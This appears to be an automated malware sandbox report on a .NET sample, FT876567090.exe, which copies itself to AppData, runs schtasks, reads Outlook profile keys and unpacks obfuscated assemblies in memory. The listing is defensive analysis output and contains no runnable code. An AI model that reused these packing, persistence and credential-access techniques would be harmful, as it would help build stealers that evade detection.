Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\FT876567090.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\FT876567090.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FT876567090.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: FT876567090.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: FT876567090.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:

Data Obfuscation

.NET source code contains potential unpacker

Source: FT876567090.exe, ServerForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: EYDNKhhJr.exe.0.dr, ServerForm.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	.Net Code: Nal7N2nq0B System.Reflection.Assembly.Load(byte[])
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	.Net Code: Nal7N2nq0B System.Reflection.Assembly.Load(byte[])
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	.Net Code: Nal7N2nq0B System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 0_2_070D1038 push ss; iretd	0_2_070D1039
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 10_2_0040E21D push ecx; ret	10_2_0040E230
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 10_2_02D5E558 push eax; iretd	10_2_02D5E559
Source: C:\Users\user\Desktop\FT876567090.exe	Code function: 10_2_06D897EF push es; ret	10_2_06D89800
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DE558 push eax; iretd	15_2_030DE559

Source: FT876567090.exe	Static PE information: section name: .text entropy: 7.6723614059541525
Source: EYDNKhhJr.exe.0.dr	Static PE information: section name: .text entropy: 7.6723614059541525

Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, gunVrZUufkMPi6OEOH.cs	High entropy of concatenated method names: 'p0RckG15xS', 'YMRcMqkHgb', 'p1IcBnOLO7', 'OewcUOOpUa', 'oiRcuUJ3vO', 'Y3xcWenDiR', 'FApcZJUs2g', 'FTtct8cWjq', 'U9ecVQjWKm', 'nfXcJRtaqc'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, y9TACZBKrPpfSKJwvL.cs	High entropy of concatenated method names: 'v4ysLiqsRm', 'wUks0kq3p1', 'aVLsDVXQsg', 'duVs1QraTv', 'fd2sTKklfY', 'pEss3QfDMl', 'YNLsSXKHJk', 'fKdsqsLJly', 'R8usETgrq3', 'CS1soniegF'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, jsAYmYy7jtZ5gPTTtNi.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sEm6VCqDLY', 'SRo6JDDjgM', 'BON6bqTxMb', 'IGn66i7PAt', 'hsf6R7xom7', 'O066pFWUls', 'DIs6h5VBvm'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, bi9ridzXvirRH9xiZe.cs	High entropy of concatenated method names: 'XkrJMColKP', 'Lm0JBin5vI', 'fyWJUOTS3Y', 'iqxJnAtnif', 'h4pJApAOcm', 'CneJgU4OZQ', 'e3tJmXWqIs', 'sJDJhGbVCp', 'DWfJaAY2nc', 'aQRJ8Z4UAf'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, eCt5ui776sJeAhtWrQ.cs	High entropy of concatenated method names: 'X68yH9TACZ', 'lrPyjpfSKJ', 'qufyxkMPi6', 'OEOyvHqESG', 'WWQyuSoHqJ', 'bNFyWNFGov', 'c3J0smQJCyHKLXmPUP', 'MaAgJ5N7jThrXp9CHi', 'Oc3yyxlH2g', 'G1MyIa48Iq'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, xneZSO22UMK1ZN6FUO.cs	High entropy of concatenated method names: 'Jg3Haw6Hk2', 'KdKH83xTyB', 'd2pHNjFOPX', 'jSSHkvGKVH', 'fr5H4qo1Ua', 'QdBHMdUvMI', 'BXsHF6Uikx', 'PX6HBfEPBo', 'CuRHUMB6ls', 'MeLH5jcMek'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, sC8mrBsiegcndi6imW.cs	High entropy of concatenated method names: 'Dispose', 'c94yEpoYXw', 'RK2eAqtAqc', 'ICLKvM4aj6', 'WrlyowYdT3', 'HceyzfK8tq', 'ProcessDialogKey', 'VIeerDt5QP', 'VLoeyloEUi', 'JR3eebhCMM'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, GCigAdecIbLlCQv76r.cs	High entropy of concatenated method names: 'wlCNHM2El', 'Ijjk9K4lw', 'LQvMEtbF0', 'KF1FfWwtH', 's8YUHIPYr', 'MRf58VvCt', 'sSMFeA0wS3HwHYVPmY', 'FDMylxVettRd7IJtSG', 'YnQtTZZOZ', 'DtTJ4EO6P'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, mkNsanf4ytZx6QJiPE.cs	High entropy of concatenated method names: 'isriBPqF1P', 'EiniUPE89C', 'ak7inr9thY', 'oY4iAJwSFH', 'UYKig1Doob', 'C3Pimbk5GQ', 'SQUi9qYlxD', 'iAdidLPxVm', 'MaWiP0gMTo', 'WaNiOYiIBP'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, fYGDXC9nLkKwVYdycp.cs	High entropy of concatenated method names: 'rY8HGErjlc', 'H9VHcknXXq', 'lfUHCKSAj9', 'rGECo0jEKo', 'dqfCzsndJn', 'DGtHre2R3v', 'UBGHy3gZMm', 'hf7HeFcIdP', 'luJHIGrKyp', 'bvEH7CxZif'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, thCMMAoHGyLR1v4VD2.cs	High entropy of concatenated method names: 'bvZJcFXLaV', 'oQQJY2nyNs', 'IyMJCfpU4P', 'GWaJHNbgAF', 'HsZJVRysjK', 'Nj6JjMLh63', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, GPiGiKyIdU4lsP3SKnM.cs	High entropy of concatenated method names: 'O5LboXui0n', 'qgObzNvSoV', 'LqW6rG2onx', 'Ix1SO6ItA3UZgIDBPq5', 'c3kWHeINIddJ7BQpFti', 'AewacAIgUDDd3FqkCNQ', 'zNP8ceIbX418MB9pDxj', 'Wpk5PVI55hKh7rWxkWt'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, cDt5QPE3LoloEUimR3.cs	High entropy of concatenated method names: 'oyjVnGPOx7', 'rAhVAJQ1Oc', 'rNKVXD3vMn', 'yBdVgi5p15', 'I1JVmLZgk3', 'NV2VleYYxo', 'OGdV9BuBdH', 'dCLVdqFU0y', 'qYqV2GQDPc', 'ODdVPH7R1D'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, jqJyNFnNFGovmngTSY.cs	High entropy of concatenated method names: 'tgaCQtEn9E', 'ayxCs6dpSj', 'ixRCYGJnCf', 'sdxCHdTRyr', 'xqTCjR1CGO', 'TBsYT07TuK', 'ScFY3lWc86', 'lIdYSXIxt2', 'dFJYqdpCpu', 'jZKYEdU5Lh'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, loiuhoc4lM5qqThqVZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MfGeEgneZv', 'jABeoy3BQ1', 'xiAezLm3PD', 'wuJIr4Z9Ok', 'tmDIyIAycm', 'LkPIekRl01', 'lDXIIEXRnx', 'xUfLRLof7kg1ms0A6I4'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	High entropy of concatenated method names: 'CrKIQyK6vR', 'OBPIGpoXmo', 'q7fIsqSF9t', 'rFuIcUpkDM', 'Ap1IYudBAP', 'X8OICO8SbW', 'hiWIHrQNeJ', 'yTIIjreGac', 'Jy9IKlTkrU', 'uDIIxPYsQa'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, XESGjM5IcVEd4SWQSo.cs	High entropy of concatenated method names: 'qjFY42fCrM', 'fceYF1l3hp', 'qobcXj181V', 'z1ocgCByGU', 'TPAcmRkhb4', 'Lg4cl0kF6L', 'f39c9PwSEY', 'h65cdLAcQ0', 'Cdvc2n4rXx', 'MnkcPjdskD'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, d6o0O5SFWI94poYXwS.cs	High entropy of concatenated method names: 'EbDVuJMHxw', 'O2fVZWvNEO', 'BKIVVd8Gcp', 'DGwVbuPkD6', 'xtaVRFUMGD', 'w6iVhloGjR', 'Dispose', 'HlStGJPbbR', 'tMOtsXnfNW', 't3JtchnPsd'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, OmD8eT1yyXhuQJSvyr.cs	High entropy of concatenated method names: 'SjZZxkcHs1', 'AJEZvIcqSR', 'ToString', 'An3ZGD4ywb', 'dU2Zsiu300', 'bTkZcVDSFh', 's5hZYiNm9b', 'IGLZCFQ8db', 'tm2ZHvsgH0', 'T7kZjwR0j0'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, uZt2wsyroqfI9T4g0lY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DXpJO2TiSA', 'fydJwmxCwD', 'kPZJffpfry', 'v2WJLYwasT', 'yOOJ0p4J6G', 'ICUJDSSEk0', 'M8VJ1DqOrQ'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, etr7vDDutw28yVrRDX.cs	High entropy of concatenated method names: 'ToString', 'bBbWOiQcy3', 'iQFWAwA9Rc', 'gXYWXT4Myn', 'P7oWgSyqqe', 'zxlWmkwIo0', 'DGoWl0ZtFp', 'Xh4W9rIyY2', 'wmFWdpabYN', 'bKeW2bAeIR'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, QHahpPyyjOnLlFYyugX.cs	High entropy of concatenated method names: 'P5fJoNFkqA', 'zcOJzWKm81', 'kIsbrr0aE1', 'jY7byoQNMh', 'FIibeJ93ZG', 'mCvbIa08kM', 'GHvb7Dy8rw', 'vPabQEdHwP', 'bhLbGFlZ25', 'dRUbsuQpRr'
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, gGEtiB3eVMC0N94kse.cs	High entropy of concatenated method names: 'UdXZquKpWw', 'yWGZojYI2Y', 'Fbdtrr4cZH', 'w57tyrQhFG', 'nSaZOJs8JB', 'upRZwuR54g', 'kuDZf1xf2R', 'HxBZL29LQj', 'cKQZ0SmhoO', 'HNjZDOQQ7Y'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, gunVrZUufkMPi6OEOH.cs	High entropy of concatenated method names: 'p0RckG15xS', 'YMRcMqkHgb', 'p1IcBnOLO7', 'OewcUOOpUa', 'oiRcuUJ3vO', 'Y3xcWenDiR', 'FApcZJUs2g', 'FTtct8cWjq', 'U9ecVQjWKm', 'nfXcJRtaqc'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, y9TACZBKrPpfSKJwvL.cs	High entropy of concatenated method names: 'v4ysLiqsRm', 'wUks0kq3p1', 'aVLsDVXQsg', 'duVs1QraTv', 'fd2sTKklfY', 'pEss3QfDMl', 'YNLsSXKHJk', 'fKdsqsLJly', 'R8usETgrq3', 'CS1soniegF'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, jsAYmYy7jtZ5gPTTtNi.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sEm6VCqDLY', 'SRo6JDDjgM', 'BON6bqTxMb', 'IGn66i7PAt', 'hsf6R7xom7', 'O066pFWUls', 'DIs6h5VBvm'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, bi9ridzXvirRH9xiZe.cs	High entropy of concatenated method names: 'XkrJMColKP', 'Lm0JBin5vI', 'fyWJUOTS3Y', 'iqxJnAtnif', 'h4pJApAOcm', 'CneJgU4OZQ', 'e3tJmXWqIs', 'sJDJhGbVCp', 'DWfJaAY2nc', 'aQRJ8Z4UAf'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, eCt5ui776sJeAhtWrQ.cs	High entropy of concatenated method names: 'X68yH9TACZ', 'lrPyjpfSKJ', 'qufyxkMPi6', 'OEOyvHqESG', 'WWQyuSoHqJ', 'bNFyWNFGov', 'c3J0smQJCyHKLXmPUP', 'MaAgJ5N7jThrXp9CHi', 'Oc3yyxlH2g', 'G1MyIa48Iq'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, xneZSO22UMK1ZN6FUO.cs	High entropy of concatenated method names: 'Jg3Haw6Hk2', 'KdKH83xTyB', 'd2pHNjFOPX', 'jSSHkvGKVH', 'fr5H4qo1Ua', 'QdBHMdUvMI', 'BXsHF6Uikx', 'PX6HBfEPBo', 'CuRHUMB6ls', 'MeLH5jcMek'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, sC8mrBsiegcndi6imW.cs	High entropy of concatenated method names: 'Dispose', 'c94yEpoYXw', 'RK2eAqtAqc', 'ICLKvM4aj6', 'WrlyowYdT3', 'HceyzfK8tq', 'ProcessDialogKey', 'VIeerDt5QP', 'VLoeyloEUi', 'JR3eebhCMM'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, GCigAdecIbLlCQv76r.cs	High entropy of concatenated method names: 'wlCNHM2El', 'Ijjk9K4lw', 'LQvMEtbF0', 'KF1FfWwtH', 's8YUHIPYr', 'MRf58VvCt', 'sSMFeA0wS3HwHYVPmY', 'FDMylxVettRd7IJtSG', 'YnQtTZZOZ', 'DtTJ4EO6P'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, mkNsanf4ytZx6QJiPE.cs	High entropy of concatenated method names: 'isriBPqF1P', 'EiniUPE89C', 'ak7inr9thY', 'oY4iAJwSFH', 'UYKig1Doob', 'C3Pimbk5GQ', 'SQUi9qYlxD', 'iAdidLPxVm', 'MaWiP0gMTo', 'WaNiOYiIBP'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, fYGDXC9nLkKwVYdycp.cs	High entropy of concatenated method names: 'rY8HGErjlc', 'H9VHcknXXq', 'lfUHCKSAj9', 'rGECo0jEKo', 'dqfCzsndJn', 'DGtHre2R3v', 'UBGHy3gZMm', 'hf7HeFcIdP', 'luJHIGrKyp', 'bvEH7CxZif'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, thCMMAoHGyLR1v4VD2.cs	High entropy of concatenated method names: 'bvZJcFXLaV', 'oQQJY2nyNs', 'IyMJCfpU4P', 'GWaJHNbgAF', 'HsZJVRysjK', 'Nj6JjMLh63', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, GPiGiKyIdU4lsP3SKnM.cs	High entropy of concatenated method names: 'O5LboXui0n', 'qgObzNvSoV', 'LqW6rG2onx', 'Ix1SO6ItA3UZgIDBPq5', 'c3kWHeINIddJ7BQpFti', 'AewacAIgUDDd3FqkCNQ', 'zNP8ceIbX418MB9pDxj', 'Wpk5PVI55hKh7rWxkWt'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, cDt5QPE3LoloEUimR3.cs	High entropy of concatenated method names: 'oyjVnGPOx7', 'rAhVAJQ1Oc', 'rNKVXD3vMn', 'yBdVgi5p15', 'I1JVmLZgk3', 'NV2VleYYxo', 'OGdV9BuBdH', 'dCLVdqFU0y', 'qYqV2GQDPc', 'ODdVPH7R1D'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, jqJyNFnNFGovmngTSY.cs	High entropy of concatenated method names: 'tgaCQtEn9E', 'ayxCs6dpSj', 'ixRCYGJnCf', 'sdxCHdTRyr', 'xqTCjR1CGO', 'TBsYT07TuK', 'ScFY3lWc86', 'lIdYSXIxt2', 'dFJYqdpCpu', 'jZKYEdU5Lh'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, loiuhoc4lM5qqThqVZ.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MfGeEgneZv', 'jABeoy3BQ1', 'xiAezLm3PD', 'wuJIr4Z9Ok', 'tmDIyIAycm', 'LkPIekRl01', 'lDXIIEXRnx', 'xUfLRLof7kg1ms0A6I4'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, qGBWZDj2yg2TJE6Bru.cs	High entropy of concatenated method names: 'CrKIQyK6vR', 'OBPIGpoXmo', 'q7fIsqSF9t', 'rFuIcUpkDM', 'Ap1IYudBAP', 'X8OICO8SbW', 'hiWIHrQNeJ', 'yTIIjreGac', 'Jy9IKlTkrU', 'uDIIxPYsQa'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, XESGjM5IcVEd4SWQSo.cs	High entropy of concatenated method names: 'qjFY42fCrM', 'fceYF1l3hp', 'qobcXj181V', 'z1ocgCByGU', 'TPAcmRkhb4', 'Lg4cl0kF6L', 'f39c9PwSEY', 'h65cdLAcQ0', 'Cdvc2n4rXx', 'MnkcPjdskD'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, d6o0O5SFWI94poYXwS.cs	High entropy of concatenated method names: 'EbDVuJMHxw', 'O2fVZWvNEO', 'BKIVVd8Gcp', 'DGwVbuPkD6', 'xtaVRFUMGD', 'w6iVhloGjR', 'Dispose', 'HlStGJPbbR', 'tMOtsXnfNW', 't3JtchnPsd'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, OmD8eT1yyXhuQJSvyr.cs	High entropy of concatenated method names: 'SjZZxkcHs1', 'AJEZvIcqSR', 'ToString', 'An3ZGD4ywb', 'dU2Zsiu300', 'bTkZcVDSFh', 's5hZYiNm9b', 'IGLZCFQ8db', 'tm2ZHvsgH0', 'T7kZjwR0j0'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, uZt2wsyroqfI9T4g0lY.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'DXpJO2TiSA', 'fydJwmxCwD', 'kPZJffpfry', 'v2WJLYwasT', 'yOOJ0p4J6G', 'ICUJDSSEk0', 'M8VJ1DqOrQ'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, etr7vDDutw28yVrRDX.cs	High entropy of concatenated method names: 'ToString', 'bBbWOiQcy3', 'iQFWAwA9Rc', 'gXYWXT4Myn', 'P7oWgSyqqe', 'zxlWmkwIo0', 'DGoWl0ZtFp', 'Xh4W9rIyY2', 'wmFWdpabYN', 'bKeW2bAeIR'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, QHahpPyyjOnLlFYyugX.cs	High entropy of concatenated method names: 'P5fJoNFkqA', 'zcOJzWKm81', 'kIsbrr0aE1', 'jY7byoQNMh', 'FIibeJ93ZG', 'mCvbIa08kM', 'GHvb7Dy8rw', 'vPabQEdHwP', 'bhLbGFlZ25', 'dRUbsuQpRr'
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, gGEtiB3eVMC0N94kse.cs	High entropy of concatenated method names: 'UdXZquKpWw', 'yWGZojYI2Y', 'Fbdtrr4cZH', 'w57tyrQhFG', 'nSaZOJs8JB', 'upRZwuR54g', 'kuDZf1xf2R', 'HxBZL29LQj', 'cKQZ0SmhoO', 'HNjZDOQQ7Y'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, gunVrZUufkMPi6OEOH.cs	High entropy of concatenated method names: 'p0RckG15xS', 'YMRcMqkHgb', 'p1IcBnOLO7', 'OewcUOOpUa', 'oiRcuUJ3vO', 'Y3xcWenDiR', 'FApcZJUs2g', 'FTtct8cWjq', 'U9ecVQjWKm', 'nfXcJRtaqc'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, y9TACZBKrPpfSKJwvL.cs	High entropy of concatenated method names: 'v4ysLiqsRm', 'wUks0kq3p1', 'aVLsDVXQsg', 'duVs1QraTv', 'fd2sTKklfY', 'pEss3QfDMl', 'YNLsSXKHJk', 'fKdsqsLJly', 'R8usETgrq3', 'CS1soniegF'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, jsAYmYy7jtZ5gPTTtNi.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'sEm6VCqDLY', 'SRo6JDDjgM', 'BON6bqTxMb', 'IGn66i7PAt', 'hsf6R7xom7', 'O066pFWUls', 'DIs6h5VBvm'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, bi9ridzXvirRH9xiZe.cs	High entropy of concatenated method names: 'XkrJMColKP', 'Lm0JBin5vI', 'fyWJUOTS3Y', 'iqxJnAtnif', 'h4pJApAOcm', 'CneJgU4OZQ', 'e3tJmXWqIs', 'sJDJhGbVCp', 'DWfJaAY2nc', 'aQRJ8Z4UAf'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, eCt5ui776sJeAhtWrQ.cs	High entropy of concatenated method names: 'X68yH9TACZ', 'lrPyjpfSKJ', 'qufyxkMPi6', 'OEOyvHqESG', 'WWQyuSoHqJ', 'bNFyWNFGov', 'c3J0smQJCyHKLXmPUP', 'MaAgJ5N7jThrXp9CHi', 'Oc3yyxlH2g', 'G1MyIa48Iq'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, xneZSO22UMK1ZN6FUO.cs	High entropy of concatenated method names: 'Jg3Haw6Hk2', 'KdKH83xTyB', 'd2pHNjFOPX', 'jSSHkvGKVH', 'fr5H4qo1Ua', 'QdBHMdUvMI', 'BXsHF6Uikx', 'PX6HBfEPBo', 'CuRHUMB6ls', 'MeLH5jcMek'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, sC8mrBsiegcndi6imW.cs	High entropy of concatenated method names: 'Dispose', 'c94yEpoYXw', 'RK2eAqtAqc', 'ICLKvM4aj6', 'WrlyowYdT3', 'HceyzfK8tq', 'ProcessDialogKey', 'VIeerDt5QP', 'VLoeyloEUi', 'JR3eebhCMM'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, GCigAdecIbLlCQv76r.cs	High entropy of concatenated method names: 'wlCNHM2El', 'Ijjk9K4lw', 'LQvMEtbF0', 'KF1FfWwtH', 's8YUHIPYr', 'MRf58VvCt', 'sSMFeA0wS3HwHYVPmY', 'FDMylxVettRd7IJtSG', 'YnQtTZZOZ', 'DtTJ4EO6P'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, mkNsanf4ytZx6QJiPE.cs	High entropy of concatenated method names: 'isriBPqF1P', 'EiniUPE89C', 'ak7inr9thY', 'oY4iAJwSFH', 'UYKig1Doob', 'C3Pimbk5GQ', 'SQUi9qYlxD', 'iAdidLPxVm', 'MaWiP0gMTo', 'WaNiOYiIBP'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, fYGDXC9nLkKwVYdycp.cs	High entropy of concatenated method names: 'rY8HGErjlc', 'H9VHcknXXq', 'lfUHCKSAj9', 'rGECo0jEKo', 'dqfCzsndJn', 'DGtHre2R3v', 'UBGHy3gZMm', 'hf7HeFcIdP', 'luJHIGrKyp', 'bvEH7CxZif'
Source: 0.2.FT876567090.exe.a2c0000.5.raw.unpack, thCMMAoHGyLR1v4VD2.cs	High entropy of concatenated method names: 'bvZJcFXLaV', 'oQQJY2nyNs', 'IyMJCfpU4P', 'GWaJHNbgAF', 'HsZJVRysjK', 'Nj6JjMLh63', 'Next', 'Next', 'Next', 'NextBytes'
